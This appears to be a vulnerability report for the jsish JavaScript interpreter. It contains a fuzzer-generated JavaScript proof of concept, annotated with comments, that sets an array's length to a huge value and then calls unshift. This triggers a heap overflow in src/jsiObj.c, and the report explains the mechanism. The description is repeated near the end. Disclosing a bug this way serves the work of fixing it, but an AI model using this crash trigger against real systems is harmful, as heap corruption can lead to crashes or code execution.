operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
poc:
// Fuzzer-generated proof of concept for the jsish heap overflow described
// below (src/jsiObj.c:428). The statement order is what matters; the
// comments only annotate what each step does in plain JavaScript.
// Start with a small two-element array whose backing store will later be forced to grow.
var o = [
1,
2
];
// Comma expression: evaluates both operands and discards the result; no effect on `o`.
o, 90040991;
var ExBs = new RegExp('>l1Pq4Q~R$!');
// Array.prototype.reverse returns the array it was called on, so from here
// on `ExBs` is an alias of `o` (the RegExp assigned above is discarded).
ExBs = o.reverse();
// ~3037000498: ToInt32 gives -1257966798, bitwise NOT gives 1257966797.
// Because `ExBs` aliases `o`, this sets o.length to that value — this appears
// to be the "maximum value" for `len` that the report refers to.
ExBs.length = ~3037000498;
// unshift adds four elements in front of an array whose length is already
// huge, so the engine must grow the backing store; per the report this is
// the resize path in jsiObj.c where `nsiz` is computed from `len`.
// (`ExBs.lastIndex` is undefined here: `ExBs` is now an array, not a RegExp.)
var zaCp = o.unshift(o.length, o, ExBs.lastIndex, o);
var FfYD = new RegExp('@OsH');
// o.constructor is Array; calling it with no arguments yields a fresh empty
// array, so `o` no longer refers to the oversized array (ExBs still does).
o = o.constructor();
// The statements from here to the end look like fuzzer filler that keeps
// referencing the aliased objects; whether any of it is needed to reach the
// overflow is not stated in the report — treat it as incidental until confirmed.
var yfSi = new Map([
[
1,
1200,
o.length,
ExBs.lastIndex
],
[
o,
ExBs,
o,
0,
-Infinity,
-Infinity
]
]);
var YAjm = yfSi.keys();
var QkwQ = new RegExp('GBY');
var dPft = new Map([
[
-2147483648,
FfYD.lastIndex,
FfYD,
3037000498,
0.1,
ExBs.length,
FfYD,
2147483649
],
[
ExBs,
FfYD.lastIndex,
-9007199254740994
]
]);
// The function passed as the second argument is coerced as the fromIndex and is not called.
var fjNQ = o.indexOf(0.2, function () {
});
var a = Object.keys(o);
var APSB = -9007199254740990 != a.length;
var wCMe = new WeakSet([]);
vulnerability description:
The code that triggers the vulnerability is at src/jsiObj.c:428; the code is as follows: `len` is the length of the Array, and the PoC initially sets it to a maximum value through o.length. After the calculation in that code, `nsiz` comes out as a negative number, which bypasses the two checks on line 421 and line 425.
The affected code is as follows: `obj->arr` is allocated a smaller block of heap memory than needed, and `memset` then writes to the region starting at `obj->arr + obj->arrMaxSize`, which already lies beyond the actual heap allocation of `obj->arr`, causing a heap overflow.
Environment
poc:
vulnerability description:
The code that triggers the vulnerability is at src/jsiObj.c:428; the code is as follows: `len` is the length of the Array, and the PoC initially sets it to a maximum value through o.length. After the calculation in that code, `nsiz` comes out as a negative number, which bypasses the two checks on line 421 and line 425. The affected code is as follows:
`obj->arr` is allocated a smaller block of heap memory than needed, and `memset` then writes to the region starting at `obj->arr + obj->arrMaxSize`, which already lies beyond the actual heap allocation of `obj->arr`, causing a heap overflow.